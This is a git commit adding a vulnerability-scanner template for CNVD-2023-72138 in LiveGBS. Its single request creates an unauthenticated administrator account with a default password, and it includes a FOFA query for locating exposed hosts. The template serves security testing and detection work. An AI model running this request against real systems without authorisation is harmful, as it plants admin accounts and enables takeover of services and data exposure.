Create CNVD-2023-72138

2024-07-18 00:28:34 +05:30 · 2024-07-18 00:28:34 +05:30 · 29a72c9cc6
parent 51194f2d14
commit 29a72c9cc6
1 changed files with 34 additions and 0 deletions
--- a/http/cnvd/2023/CNVD-2023-72138
+++ b/http/cnvd/2023/CNVD-2023-72138
@ -0,0 +1,34 @@
+id: CNVD-2023-72138
+
+info:
+  name: LiveGBS user/save - Logical Flaw
+  author: pussycat0x
+  severity: high
+  description: |
+    There is a logic defect vulnerability in LiveGBS user/save. Unauthenticated attackers can exploit this vulnerability to arbitrarily add users, resulting in the takeover of background services and causing adverse effects such as information leakage.
+  reference:
+    - https://github.com/wy876/POC/blob/main/LiveGBS%E5%AD%98%E5%9C%A8%E9%80%BB%E8%BE%91%E7%BC%BA%E9%99%B7%E6%BC%8F%E6%B4%9E(CNVD-2023-72138).md
+  metadata:
+    fofa-query: icon_hash="-206100324"
+  tags: lvs,lfi,misconfig
+
+variables:
+  user: "{{to_lower(rand_base(5))}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/v1/user/save?ID=&Username={{user}}&Role=管理员&Enable=true"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"DefaultUserPassword": "12345678"'
+          - 'ID'
+        condition: and
+
+      - type: status
+        status:
+          - 200